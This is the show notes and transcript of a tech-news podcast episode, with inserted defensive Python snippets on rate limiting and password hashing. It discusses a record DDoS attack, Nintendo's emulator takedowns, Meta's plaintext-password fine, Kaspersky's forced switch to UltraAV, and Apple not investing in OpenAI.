380: Meta Stored Passwords in Plain Text! (Plus, Apple Backs Out of OpenAI Investment?!)

Episode 380 October 03, 2024 01:28:05
Technado


Show Notes

Put on your tinfoil hats - we get into controversial territory on this week’s episode. AI laws, Nintendo legal smackdowns, North Korean infiltration, and Kaspersky force-downloads…all this and more coming up on Technado!


Episode Transcript

[00:00:04] Speaker A: You're listening to Technado. Welcome back for another episode of Technado. Reminder: you can use that code, Technado30, for a discount on your IT Pro membership. And IT Pro comes to us from our sponsor, ACI Learning. That's what we do in our day jobs. They're all connected, affiliated. It's all the same. [00:00:22] Speaker B: It's a big, happy family. [00:00:23] Speaker A: Yeah. It's one big web. Man, you're hurting me. So check that. Check that library out. If you're interested in some cybersecurity tech type training, we do that in our day jobs, and we have a lot of fun doing it, but that's not what we're here for. We're here to talk about cyber and tech news, which is decidedly a different brand of fun because we get to look at the world burning around us and laugh, because if we don't, we'll cry. [00:00:45] Speaker B: That's kind of the thing. [00:00:46] Speaker A: That's basically it. That's ridiculous. [00:00:50] Speaker B: Choke back the tears. Throw a smile. [00:00:52] Speaker A: We've got. Honestly, we have some global stuff. We have some Russia related stuff. We got some North Korea related stuff. We got stuff going on in California. So it's gonna be. It's gonna be a good day today. But we always like to start with a little bit of. A little bit of new stuff, stuff that's just coming out the morning of, as we're recording this. And we like to call this breaking news. [00:01:13] Speaker B: Breaking news. [00:01:15] Speaker A: You know, if you listen real closely, you might be able to hear faintly, the last week's. [00:01:20] Speaker B: I doubt the gate, like, if we were talking, you might pick it up, but the gate's probably done. [00:01:23] Speaker A: I must have been last week's. I must have, like, said something, because last week's episode, I went back and watched just the first part, and I could hear right before the real sound effect, I could hear break from Christian. So thank you for that, Christian.
[00:01:33] Speaker B: That's funny. [00:01:34] Speaker A: So in this week's breaking news, we have. We have some record breaking. A record breaking DDoS attack, to be exact. It peaked at 3.8. I think that's terabits. I always get the lowercase and uppercase B mixed up. So you can. [00:01:45] Speaker B: Yeah, what does it matter? We'll just say Tbps. You know what it means. You know, the thing. [00:01:52] Speaker A: So it's. It's been mitigated. This was a Cloud. Cloudflare mitigated this, but it peaked at that amount. Whatever. Whatever that might mean. And I have to go again. This is just breaking. So we just. I mean, as you can see, it was just posted this morning, October 2, when we're filming this. Happy October, by the way. But this was against, I guess it was against an unidentified customer of a hosting provider that uses Cloudflare. So of course they're not going to expose that, that customer. I can appreciate that. [00:02:19] Speaker B: But listen, all the people that use that service know exactly who went down because they're like, why is this nothing I can't get here? [00:02:27] Speaker A: That is true. That is true. Yeah. Oh, 2.14 billion packets per second is another. Yeah, another rate that they showed. So that is quite a high number. Anytime you see a billion. [00:02:36] Speaker B: Yeah. Apparently the DDoS attack game is getting strong here lately because we saw the whole thing with, like, earlier this year was the HTTP/2 Rapid Reset thing, right, which was like the big dog. This was massive. And I think technically that still holds the record, but that's a different type of attack for this type of attack. If I could be off on this. So don't quote me. Fact check the mess out of this. Listen, we're just talking news here, people. I don't have to be 100% accurate. You go do your own research. All I'm telling you is that, hey, look, big, nasty DDoS attack has gone crazy.
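For the numbers-minded: the lowercase-b/uppercase-B confusion above matters, since Tbps means terabits per second, not terabytes. A quick back-of-envelope in Python, using the two figures quoted in the episode (treating the bits-per-second and packets-per-second peaks as describing the same flood is a simplifying assumption; Cloudflare's report may quote them from different moments):

```python
# Back-of-envelope math on the reported peaks. Figures come from the episode;
# assuming the bps and pps peaks are simultaneous is our simplification.
peak_bits_per_sec = 3.8e12      # 3.8 Tbps -- lowercase b, so bits, not bytes
peak_packets_per_sec = 2.14e9   # 2.14 billion packets per second

bytes_per_sec = peak_bits_per_sec / 8                    # 8 bits per byte
avg_packet_bytes = bytes_per_sec / peak_packets_per_sec  # implied mean packet size

print(f"{bytes_per_sec / 1e9:.0f} GB/s")       # 475 GB/s
print(f"{avg_packet_bytes:.0f} bytes/packet")  # ~222 bytes: a flood of small packets
```

An implied average of roughly 222 bytes per packet is consistent with a volumetric flood of many small packets rather than a few large transfers.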
And, you know, for me, I feel like denial of service attacks are kind of the redheaded stepchild of cybersecurity of, like, things that you need to be concerned with. Yeah, but they're like a real problem. [00:03:27] Speaker A: Oh, yeah, right. Well, and with pretty heavy implications, especially, you know, even if you've just got a business or something, even just a little bit of downtime. [00:03:34] Speaker B: Yeah. [00:03:34] Speaker A: At the very least, it affects your reputation. Right. [00:03:37] Speaker B: You know what it is? You're absolutely right. A and B, it's not sexy. Cool. [00:03:42] Speaker A: Yeah. [00:03:42] Speaker B: Right, RCEs, that's cool. And that's no joke. The RCEs are cool as hell. I mean, you know, except for the horrible part where hackers are breaking in and doing stuff they shouldn't be doing. Not my best favorite part of it, but the act of, like, figuring out the vulnerability and being able to actually manipulate it and exploit it, abuse those things to your own advantage, that is. That's kind of flipping cool. [00:04:05] Speaker A: Takes some brains, right? [00:04:07] Speaker B: Send in a bunch of bazillion packets to things so it can't respond. It's just, it doesn't have that pizzazz that pop. [00:04:14] Speaker A: And usually they're, I mean, using things like botnets for this, right? It's. They've got all these machines kind of doing it for them. And so to me, that's kind of what I was thinking as we first pulled this up was like, of all of the different types of attacks that we talk about, I think one of my least favorites is like, like worms and stuff because it's like you just let it propagate itself and it's like, okay, that's great for you. And it's easy, you know, you just, once you get in and you set it running, it kind of does its thing. [00:04:36] Speaker B: Yeah. [00:04:36] Speaker A: Lazy, but you know, hey, it gets the job done. [00:04:38] Speaker B: Yeah, yeah, yeah.
[00:04:39] Speaker A: And this is like kind of in the same vein to me. Like, okay, you just, you know, once you, I'm sure it took effort to set up and to get it going, but then it's just you kind of, you're letting a botnet do your work for. Whereas the other stuff like RCEs, it does seem like it takes some brains, it takes some effort and some time to figure it out, to maintain persistence and stuff like that once you gain access. [00:04:57] Speaker B: Right. And not that it doesn't take brains and effort to figure out, sure. How to pull off these massive scale, but kind of to Sophia's point is you just kind of build a big packet gun. [00:05:09] Speaker A: Yeah. [00:05:10] Speaker B: Basically is what's going on and you're shooting at your target and it's going, wow, I can't, I can't process all this. And therefore it falls over. Now why I, why I say that? It's kind of the redheaded stepchild. We see that denial of service. Yeah. Oh, well, what are you going to do? But this is probably one of the bigger issues that a lot of companies have to deal with. Organizations, they have to deal with this. And it just doesn't get the, doesn't get the paper right. It doesn't get the headline because it's like denial of service. Yeah, botnets, they do the thing. But when you start looking into botnets and the traffic and basically the denial-of-service-as-a-service kind of systems that are out there where you, just as long as you got the money, somebody's got the botnet. Hey, you give me the money, I'll, I'll point this gun at anybody you want me to. And they don't care. If you're ever one of the, if you're ever in an organization that's having to deal with a denial of service attack, it's like a real issue. It's, it's not fun to have to kind of spin up protections to figure out, well, how are they attacking us? How can we mitigate that?
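Since the hosts ask "how can we mitigate that?", one classic building block is per-client rate limiting, sketched here as a token bucket in Python. This is an illustrative toy, not Cloudflare's actual mitigation (real DDoS defense lives in anycast networks and kernel fast paths, not application-level Python); the class and parameter names are ours:

```python
import time

class TokenBucket:
    """Toy per-client rate limiter: refill `rate` tokens/sec, burst up to `capacity`."""

    def __init__(self, rate: float, capacity: float) -> None:
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity          # start full so a normal burst is allowed
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill in proportion to elapsed time, capped at bucket capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False                    # over budget: drop or challenge the request
```

A flooding source burns through its bucket immediately and gets dropped, while a normal client never notices the limit; with `rate=0.0` (no refill) a bucket of capacity 3 admits exactly three requests and refuses the rest.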
So we should probably put that more on the forefront of our minds of like, what are we doing as far as the different types of denial of service attacks that might be lobbed against us. [00:06:24] Speaker A: Yeah. [00:06:24] Speaker B: And what are our defenses in that way? We, we tend to just focus on AV, EDR. [00:06:29] Speaker A: Sure. [00:06:29] Speaker B: And for good reason. But don't forget there is denial of service out there. [00:06:33] Speaker A: Sure. Yeah. I mean, I'm not going to not put a lock on my door, but I got to worry about the windows too. Like, it's, it's, it's not that it's any less important. It's just, you're right, it doesn't really get the, we don't see headlines about this kind of stuff very often, I don't think. But RCEs and stuff that's in the headlines all the time, that's, that's a daily critical vulnerability. [00:06:50] Speaker B: Ten. And new malware. And it's malware. CVEs, RCEs. And what's the other thing that we probably see most of the time? Breach. Breaches. [00:07:02] Speaker A: Breaches. Breaches of various varieties. Yeah, breaches. Start singing the song. [00:07:08] Speaker B: I'm still gonna make that shirt, right? [00:07:10] Speaker A: Yeah, just, just, well, if you're gonna start using Nintendo imagery. Oh, careful, because that's a great segue. [00:07:17] Speaker B: What you did there. [00:07:18] Speaker A: Nintendo is. They are not done shutting down emulators. So there was an emulator. I'm gonna butcher this. Ryujinx. Ryujinx. I'm so sorry. Ryu. Ryujinx. Yeah, it was shut down after, quote, unquote, contact by Nintendo. And we did talk about a couple months ago, a couple weeks ago. Time's not real. An emulator called, I think it was like Yuzu or something like that, that got shut down. Oh, yeah. So this is not the first time. [00:07:42] Speaker B: Like, Dolphin got shut down. Yeah, right. [00:07:44] Speaker A: Like they're going nuts. [00:07:45] Speaker B: Listen, they have always been like this. Always.
When I say they, I mean Nintendo. I've talked about this before. I was around when, when the first Nintendo emulators hit. [00:07:57] Speaker A: Yeah. [00:07:57] Speaker B: I was like, this is the coolest thing ever. And then Nintendo was like, it's not the coolest thing ever. I don't like this at all. And even before emulators were a thing, they were suing, like, Blockbuster Video for you renting their games. [00:08:10] Speaker A: Yeah, right. [00:08:11] Speaker B: And then when the court said, eh, that's a, that's a bridge too far. Right. You know what they did? They sued them again because they were putting the, the booklet that comes with the game. They were making copies of it because. [00:08:25] Speaker A: People were taking them. [00:08:26] Speaker B: Yeah. They would get destroyed or lost or whatever. And they were like, copyright infringement. [00:08:30] Speaker A: Wow. [00:08:31] Speaker B: Right? And then they were like, son of a. So Blockbuster had to create their, they hired like, writers and, and people that, and designed their own inserts. [00:08:43] Speaker A: Oh, good for them. [00:08:44] Speaker B: So that they weren't invading the copyright or infringing on the copyright IP of Nintendo. And that's what was going in their sleeves with the games. Like, they, they do not play. Nintendo don't want you nowhere near their IP. They don't want you looking at their IP. They don't want you breathing near their IP. If you do, there will be hell to pay. I was, I was telling Sophia, I watch a bunch of YouTube channels that cover handhelds that use emulators and things that naturally I'm just like, staying on top of what's going on in the business and especially the handhelds. I'm really interested in retro handhelds and like, ROG and Steam and all that stuff that's going on. It's just cool tech. And if I had, you know, unceasing amounts of money, I would buy a bunch of them. But this, I think it was Retro Game Corp.
And they were showing a new handheld and it was doing Wii U emulation and showing you how well it did Wii U emulation with, I think, Ryujinx as the emulator. And he got a hard copyright strike from Nintendo over that, and he said he had to go back and blur all the images in that. From now on, he won't be using any Nintendo games to demonstrate with anymore so that he doesn't have to worry. He's like, I just can't, I just can't fight a billion dollar company, man. I'm like, what the heck? Yeah. He's literally making people want to do stuff with Nintendo and they're like, no. [00:10:18] Speaker A: No, didn't, wasn't there something that when they, when this came up a few months ago, it was. I think we kind of agreed that, like, okay, I could see if there's an emulator that is, I don't know, that new Mario RPG that's coming out, Brothership, in like, November. If there was an emulator that came out, then next year, that was like, oh, you can emulate this game. I could see Nintendo being like, hey, this is a recent game. We're making money off this, and like, don't do that. Right? [00:10:40] Speaker B: You're cutting into viable profits. [00:10:42] Speaker A: Yeah, sure, exactly. I can understand Nintendo being like, uh, uh, you gotta shut that down. But it was the games that are like, this is no longer, this is such an old game, it's. You don't even make a console anymore. You don't make. [00:10:50] Speaker B: It was only in Japan kind of stuff. [00:10:52] Speaker A: Like, you're not. Any games, any copies of this game that are being sold are being sold by, like, GameStop, if that still exists, or eBay or whatever. So Nintendo's not making money off it anyway. [00:11:01] Speaker B: There is a bunch of, like, stores out there that sell retro games, and that's. But again, that money has already been made by Nintendo. [00:11:06] Speaker A: Right? [00:11:07] Speaker B: Nintendo doesn't see a dime on those. [00:11:08] Speaker A: Resales, so what do you care?
I guess maybe it's like, so I've. [00:11:12] Speaker B: Heard that it is old school Japan. Like the old school Japanese business model is that no one touches your IP. No one, ever. You never give it away. You never do anything. And since a lot of the executives at Nintendo are old school Japanese people. [00:11:33] Speaker A: Yeah, that. [00:11:34] Speaker B: That's just their mindset. And you're not teaching that old dog a new trick because they're. I feel. Feel like, personally, that there is a good argument to be made on the historicity of the games, and some of these games are going to. Are dying out. Like, we're going to lose them because they won't release it at all. It's like George Lucas taking the original Star Wars films and sticking them in a vault and going, nope, you can't have it. Yeah, like, that's weird. This was such an iconic historical event that to shelve it away to a dustbin of history where it never can be seen again or touched seems odd and a disservice to the future. Yeah, that's just my humble opinion. [00:12:19] Speaker A: You would think. You would think. [00:12:20] Speaker B: I'm not saying it's a perfect opinion based on, like, I get there's nuance and gray area to it, but I. [00:12:26] Speaker A: But, yeah, I think. I think you're right, and I think that before. Before we move off of this, there was. This is a different article that I found on this, but the creator of Ryujinx got. They were contacted by Nintendo, and I guess what happened is they were offered an agreement, very vague, to stop working on the project, remove the organization, and all related assets that they're in control of. There was no confirmation on whether the developer took the agreement or whether the creator took the agreement, but the organization's been removed, so it's pretty safe to. [00:12:57] Speaker B: Say they probably took the agreement. [00:12:59] Speaker A: So I don't know if it was like, we'll pay you. I don't know if it was.
If it was less an agreement and more like a godfather type agreement. Like, we'll make you an offer you can't refuse, kind of a thing. Who knows? [00:13:09] Speaker B: Luca Brasi sleeps with the fishes, so. [00:13:13] Speaker A: There's not a ton of information on that front. But they were working on, like, an iOS port and Android version, and that's all not going to happen now. So let's just, you know, rest in peace to another fallen soldier and these poor emulators. I just have to wonder what the future looks like for them. Yeah, but I got to give it to Nintendo. They are. They're on top of it. Their legal team's on top of it. But moving on from our breaking news stuff, speaking of legal issues, another big name, Meta, is dealing with some stuff this week. Never. Never heard of them. Yeah, I wish. Meta fined 91 million. I think that's euros, right? For storing millions of Facebook and Instagram passwords in plain text? [00:13:50] Speaker B: Uh oh. [00:13:50] Speaker A: And I think, correct me if I'm wrong, but I think this has been ongoing since, like, 2019 is when this was discovered that they were. Oh, sorry. We were storing passwords in plain text. We didn't realize it. And just now is when this all is coming to, you know, a full circle moment. And now they're gonna have to pay this fine. [00:14:04] Speaker B: Yeah, it looks like they have. They've done a boo boo. They did a, uh oh, shocker. Yeah, shocker. Here was the big takeaway I took from this article. Is that big companies that probably are putting millions of dollars behind security, following regulation and doing all that stuff, mistakes still get made. I remember back when Don was still on the show, me and him kind of got into a little kerfuffle. Not. Not great, not a big one, but a little disagreement on, I think because Apple got hacked or something. Apple had a hack that happened, and he was like, they just need to do security better. I'm like, they're. They're a trillion dollar company.
Do you think they're not that they don't have the best security on earth? Of course they do. [00:14:51] Speaker A: Microsoft security is not the issue. [00:14:53] Speaker B: Microsoft has the best security on earth. Here's the problem. The problem isn't that they're not doing it right. It's that it's really hard. It's really difficult to do well all the time, right? You're asking for sinless perfection 100% of the time. And yes, I get it. They're a huge company. They got a lot of stuff, Meta. And listen, I'm no fan of Meta, but they're going to make mistakes. So if you think that just because they got billions that they're going to be sinless perfection 24/7, 365, the problem is you, like, you are making the mistake because people still run that company. People still do the security at that company, and things are going to get overlooked. And anybody that's worked in a corporate system knows that there are all these pressures to get things to do. Oh, we've got deadlines and we have to hit launch dates and we've got, oh, we've promised this and that and the other. And management, who has no idea what goes on to actually make those things happen, goes, hey, I over promised this. You need to deliver. And they're like, shit, how do I do that? And they're just doing the best they can. And when it comes to their security, it's the same thing. It's the same thing. And you're going to overlook something and things are going to happen. Does that excuse them from doing it? Absolutely not. Right. You make the mistake, you got to pay the piper. [00:16:13] Speaker A: Right. And I think, I think a lot of it, and we've talked about this before, is how they react or how they respond and address this stuff. If you have a company like rhymes with fast mast that, you know, maybe has some stuff that comes up and they continually say, no, it's actually not a problem. Well, maybe it is, but it's not that kind of problem.
Oh, it is that kind of problem, but it's not as big of a deal as you think. Oh, it's worse after a while. You lose trust. And so it's like, yes, I think you're right. The bigger the company. Yes, you have a lot more resources. Yes, you've got, you know, bigger teams and hopefully better security practices and things like that, but you also then become a bigger target. I think Meta is a much bigger target than, you know, any other mom and pop. Right? And also, like you said, you've got, maybe you've got promises that are being made and things that are happening that it's hard to keep track of. Everything, I would imagine, you know, you've, you become this big conglomerate. You've grown so much. So I can see why stuff like this would happen. They are going to pay this fine, which is, I think, in euros, but in dollars, that's over 100 million. So no small potatoes. And hopefully this is, like I said, this happened in 2019, so I would hope that this is not still an issue. [00:17:18] Speaker B: Now the question becomes, like, if you didn't have enough reason to distrust Meta and close your Instagram and Facebook accounts, you know, they were storing your passwords in plain text. Yeah, right. Maybe that. That's enough. Just get off these platforms, please. Please. Social. Just dump social media. [00:17:40] Speaker A: I'm pretty sure they're also still using. Unless you're a minor in the European Union, they are still. They are using your data to train their AI models. And it's either very. It's not impossible to opt out. I don't think. I think that would be illegal, but it's very, very, very. [00:17:54] Speaker B: They would really like you to not opt out. [00:17:55] Speaker A: It is such a convoluted process. I tried to do it, and I'm like, did you really? I'm like, where the hell am I even supposed to go? I opted out really easy from. From Instagram. [00:18:05] Speaker B: It was, like, super easy. [00:18:06] Speaker A: I want you to walk me through.
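Editor's aside, for context on why "plain text" is the cardinal sin here: passwords are supposed to be stored only as salted, slow hashes, so a leaked database doesn't expose the credentials themselves. A minimal Python sketch of the idea (illustrative only, not Meta's code; the scrypt parameters are example values, not a vetted production configuration):

```python
import hashlib
import hmac
import os

def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest); only these -- never the plaintext -- get stored."""
    salt = os.urandom(16)                       # unique per user; defeats rainbow tables
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=2**14, r=8, p=1)  # memory-hard KDF slows brute force
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison
```

On login you re-derive the hash from the submitted password and compare; there is never a reason for the plaintext to touch disk or logs, which is exactly what went wrong in the story above.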
[00:18:06] Speaker B: Deleted my account. I was opted out. It was amazing. [00:18:10] Speaker A: Fair enough. Fair enough. [00:18:12] Speaker B: Now, there might be a few people out there going, but, Daniel, you have an Instagram account. I don't have an Instagram account. [00:18:17] Speaker A: He has somebody that runs it for him. [00:18:19] Speaker B: My wife. She's like, can I make you an Instagram account? I think you should do on Instagram. Like, I don't care, whatever. [00:18:25] Speaker A: Do whatever you want. [00:18:27] Speaker B: Send me something, and I'll put it on Instagram. [00:18:29] Speaker A: I said, okay, since we're talking about Meta really quick, I thought you'd think this was funny. He was talking about, he did, like, an interview this week with. With some news organization, and he was talking about, like, the future of Meta and how he thinks, like, smart glasses are gonna replace smartphones in the next ten years and all this stuff. But this is what he looked like. [00:18:44] Speaker B: If you see these dumb things. [00:18:47] Speaker A: So this is what he looks like. Oh, the glasses. [00:18:50] Speaker B: Yeah, yeah, the glasses are cartoonish. [00:18:52] Speaker A: Yeah, they look so dumb. Yeah, he looks like the. [00:18:54] Speaker B: I knew that he had, like, started working out, and grew his hair out, got a tan. [00:18:59] Speaker A: Some people are like, oh, he's changing his image. But somebody posted a picture of him looking like this and said, he looks like Andy Samberg playing Jack Harlow on SNL. I don't know. That's Jack Harlow. He's a rapper. And I just thought that was. [00:19:11] Speaker B: Looked like that. [00:19:13] Speaker A: He looks like Andy Samberg playing Jack Harlow. [00:19:15] Speaker B: That's legit. [00:19:15] Speaker A: I got a kick out of that. That made me giggle. But, yeah, he was talking about, like, the new. Maybe I can pull out the Meta smart glasses or whatever. He looks like Dexter's Laboratory wearing things.
[00:19:28] Speaker B: My friend has a picture of him of the, like, the Ray-Ban Meta glasses. [00:19:32] Speaker A: Yeah. And they look pretty decent. [00:19:35] Speaker B: They look like fairly normal glasses. They're a little bit thicker than what you would normally see, but not like, insane. And the only I saw that he got them, and I saw it said Meta, and I went, oh. And I saw the cameras on either side of his frames. I was like, so you're, you're watching me, huh? You recording everything and sending it back to Meta. [00:19:59] Speaker A: You like, you like being. These look like 3D printed glasses? [00:20:02] Speaker B: These are ridiculous. They. So my friend's glasses do not look like this. These are augmented reality glasses. [00:20:07] Speaker A: Okay, then maybe that's what I was thinking. [00:20:09] Speaker B: The Meta glasses that my friend has. [00:20:11] Speaker A: Are pretty slick looking. [00:20:12] Speaker B: They're not bad. Yeah. [00:20:13] Speaker A: Okay. Okay. Well, it's good to know. I'm not gonna. [00:20:16] Speaker B: I don't like the fact that he's got two cameras in them. [00:20:18] Speaker A: Yeah. [00:20:18] Speaker B: And that, you know, if you don't think all that information is going back to Meta. [00:20:23] Speaker A: Oh, absolutely. [00:20:24] Speaker B: And that it's taking images all the time, you are absolutely wrong. [00:20:27] Speaker A: There was something, I didn't pull it for this week, so I won't dwell on it too long. I know we got other stuff to get to, but I saw something that was like, yeah, you know, it's like you said, it's not just when the user prompts it to take a picture, it's just constantly sending information back. It's training itself. Right, on everything that you see. Well, it's retaining that information like you can't really control. It's not like you can say, nope, turn off, I don't want you. Yeah, you can't really do that. So I don't. I think Zuck is wrong.
Not that he doesn't have his finger on the pulse of technology, but I don't think smart glasses are going to replace smartphones in the next ten years. I think maybe they'll become more popular. I don't think that's. No, I think that smartphones are going to be around for a long time to come. But what do I know? Right? So moving on from that, not that I don't love to hate on Meta sometimes, but moving on, we've got a lovely little segment for you. Following up on some stuff we talked about last week is Deja news. Deja news. Love that little sound effect. [00:21:23] Speaker B: It is. [00:21:24] Speaker A: So you might recall last week we talked about a little, just a little known brand called Kaspersky. You might have heard of them. That unfortunately, or fortunately, depending on how you look at it, is banned now in the US. Right? So they had to. People that were using Kaspersky had to remove this software. And last week they force installed a new software program on people's computers. Kaspersky uninstalled itself and people woke up the next morning and there was this Ultra AV on their, on their machines. And people were understandably very upset about it. [00:21:54] Speaker B: But it's ultra. [00:21:55] Speaker A: It's ultra, it's mega. If you. It's meta. No, it's not. No, it's not. I don't want to get in trouble. [00:22:01] Speaker B: Big news. [00:22:03] Speaker A: But, uh, somebody listen. [00:22:04] Speaker B: Disinformation, Goodwin. [00:22:07] Speaker A: It's misinformation. Thank you. There is a difference apparently. So the, they had a spokesperson, because first, get a spokesperson, that came out defending the choice to force replace this security software. This should be good, right? What defense do you possibly have for this? I believe their spokesperson is named Francisco. [00:22:23] Speaker B: The last Francisco Frank. [00:22:25] Speaker A: Oh, good old Frankie. Yeah, they said.
So Kaspersky pushed an uninstall of Kaspersky products and an automatic install of Ultra AV, which a lot of people had not even heard of. Um, didn't give people the option on Windows machines. Right. This person said, hey, you were all informed of this process, okay? US customers that were eligible for this transition, we emailed you. We told you that we were going to do this automatically. And the reason we did it was for your good. We did this so you wouldn't experience a lapse in coverage. Oh, okay. Well, the argument against that then is this. Was this only applied to Windows users? Right? On, on Mac, you had to go in and do this yourself. It couldn't force install itself. I wonder why. But on Windows computers, if you don't have a third party antivirus, or if you have one and then you uninstall it, Defender switches back on automatically. And it sounds like, based on user reviews, Defender is actually a little better than this Ultra AV product. Now I did a little bit of digging last week after our show and went to the Pango Group website. Okay. Or Pango, whatever it's called. Website. Okay. [00:23:28] Speaker B: Yeah. [00:23:28] Speaker A: And Kaspersky is listed as a name on that site. And of course I'm not able to find it now because it took me forever to find the site in the first place. It's hidden quite well. [00:23:35] Speaker B: You should know to bookmark things, right? [00:23:37] Speaker A: Yeah, well, and I did it on my computer at home, so I wouldn't be able to pull it up here anyway. [00:23:40] Speaker B: Oh, you're not. But logged into Firefox like your account all your. [00:23:44] Speaker A: I don't think so. [00:23:45] Speaker B: Bookmarks will sync. [00:23:45] Speaker A: I think I'm just because I don't use my home computer very often. I just pull up on Edge. I know. [00:23:50] Speaker B: I'm actually, I'm actually kind of proud. [00:23:51] Speaker A: Oh, really? [00:23:53] Speaker B: Because you're not.
[00:23:54] Speaker A: It was more of a lazy thing. But yes, you're right. Yeah. It was a security thing for sure. But when I was looking at this Pango Group thing, Kaspersky was listed as a name. And I don't know if it was supposed to be a. There was no context of why Kaspersky. And then I think, like, Bank of America was another one. No context of like, are these partners, are these people that use our products? But I'm thinking if they're affiliated in any way and we want to get as far away from Kaspersky as possible because they might be, you know, Russian government informants and. Da. Da, da. Then why on earth would this be any better of a product? Why would a product coming from Pango, that's not Kaspersky, that's Ultra AV. Why would it matter? And the founders of supposedly of this product were both. One of them was from Russia and the other one was from Lithuania. So it's like, if. If the issue is getting away from Russian manufactured products or Russia based products, this is not any better. So the whole argument for replacing it with this falls apart. Like, it just. What's the point? Why was this even allowed to happen? The whole thing is, is weird to me. Um, and I think this defense just falls flat. What do you think? [00:24:49] Speaker B: I agree. Oh, okay. No, I. When they said it last night, like, last week, that was their answer, right? It was like, oh, we want them to make sure that you were. You always had coverage. [00:24:59] Speaker A: Sure. [00:25:00] Speaker B: I appreciate that I said that last week. I appreciate that you don't take, like, a mafioso type approach to making sure that I'm covered by forcing coverage down my throat and go, see, you're covered. Yeah. Eat that. Yeah, it tastes good. That coverage is good for you, right? It's like, I don't think you get how this works. You've been spending a little too much time over there with them, Russian mafia people, to understand that, hey, I already have coverage, so why push me to do this?
It just seems fishy. And I. Not that I've ever been a Kaspersky defender, per se, I do think that they've gotten a lot of, like, weird reputational thing based off, like, our government and stuff. I've never seen them in my experience. Not that I ever, like, tried to research out Kaspersky and all its KGB ties or whatever, but they've always seemed to been really friendly to the cybersecurity community, always doing good research, offering good papers. There's a lot of benefit that has come out of the Kaspersky group. This has not been one of them. It is not good for them. Just optically it looks bad. This looks like this was a, this was a move that you have made that gave any detractors against Kaspersky a foothold. And go see, yeah, I told you they were fishy. Yeah, because this is fishy as hell. [00:26:29] Speaker A: Because, yeah, there are now people that are saying, because of the apparent tie between this Pango Group that backs Ultra AV and Kaspersky saying like, oh, well, then Kaspersky must have been. Or this is just a way for them to maintain their foothold. And they're not Kaspersky anymore. Now they're Ultra AV. They've just basically rebranded because Ultra AV doesn't really have a super public track record that anybody can really find as far as. Yeah, it's been around for, hey, here's an article from two years ago on how this software works. It just kind of just popped up as a company. Yeah, it's just very, like, sudden. So I don't want to be like, I don't want to say for sure whether or not that's the case. I don't even use Kaspersky. So I don't know why I'm so. [00:27:06] Speaker B: Fired up about it. No skin in the game. [00:27:08] Speaker A: But like, just as an outsider looking in, I'm like, objectively stinks. The whole thing stinks. I don't like it. [00:27:15] Speaker B: It stinks. What was that from the Tobey Maguire Spider-Man? They were asking people on the street, what do you think about Spider-Man?
And the cop is like, he stinks and I don't like him. [00:27:24] Speaker A: Oh, sure. I meant more like it stinks of BS, but yes, that too. Sure. And it sounds like, you said, Kaspersky, you know, a lot of people like their product, so it's a shame that it's going this way. And they seem to have a pretty decent public image with a lot of people. And I feel like this is just not doing them any favors. So I don't really buy what their spokespeople put out. Curious what y'all think, though. Especially. There's a whiff. Yeah. Especially if you were a Kaspersky user, if you experienced this, like, forcible transition. What do you think about this? I would love to hear about that, honestly. And especially, maybe you've heard of UltraAV before, and I have wrong information. Maybe it's been around. You're like, I've been using this since 2004. I don't know. [00:28:02] Speaker B: There's tons of AVs out there that I've never heard of in my life. I mean, just go to VirusTotal, right? And there's like 60-something. [00:28:09] Speaker A: Yeah. [00:28:10] Speaker B: That they use for testing against, to see what connects with what. [00:28:13] Speaker A: But I just couldn't find anything on it, which is weird to me. [00:28:16] Speaker B: It's just weird. [00:28:16] Speaker A: It's weird to me because you'd think I'd be able to find something. Anyway. [00:28:20] Speaker B: Strange. [00:28:21] Speaker A: Maybe that's none of my business. I don't know. So we're gonna. [00:28:23] Speaker B: Moving on. [00:28:24] Speaker A: We'll move on. Maybe try to get in one or two more before our break here, if we have time. This is concerning another big brand that we've been talking about a lot in the last few weeks. Despite being one of the biggest selling points of Apple Intelligence, Apple will not be investing in OpenAI. Now, I don't want to bury the lede or mislead you all or anything.
They are still saying that they are going to incorporate ChatGPT into their Apple Intelligence features once those roll out, because those Apple Intelligence features have not rolled out yet. Sometime before the end of the year. iOS 18 is out, but these features are not. They're still in the works. I don't know. But ChatGPT is still going to be incorporated into that. So they are still going to be working with and using some of OpenAI's technology, or whatever you want to call it, but they're not investing. And up until this point, they were. Yeah, we're going to invest. We're backing them. Backed out at the eleventh hour. Now, another important point, or potentially important. Uh, OpenAI previously was a nonprofit. It is now for-profit. And it was never supposed to be a for-profit company. It was supposed to be, hey, this is artificial intelligence for the benefit of humanity. We're doing this for the good of everyone. We're not looking to make money. [00:29:27] Speaker B: But, you know, then they saw that money, right? I mean, it'd be a shame. [00:29:31] Speaker A: Money changes things when it's on the table. And their CTO left, it seems like, as a result of that new business model. So there are some changes happening in OpenAI. So that could very well be part of the reason why Apple was like, eh, we'll pass. But they're still gonna be using their technology in their new Apple Intelligence, which was a huge selling point. [00:29:48] Speaker B: They're just not investing in it. [00:29:49] Speaker A: Right, exactly. So some people are a little confused. Like, if you believe in this product and you're gonna use it in your own technology. [00:29:59] Speaker B: I didn't read the article. [00:30:01] Speaker A: Fair enough. [00:30:01] Speaker B: But it seems like, just on its surface, wouldn't that be like a business thing? More, more like that, yeah.
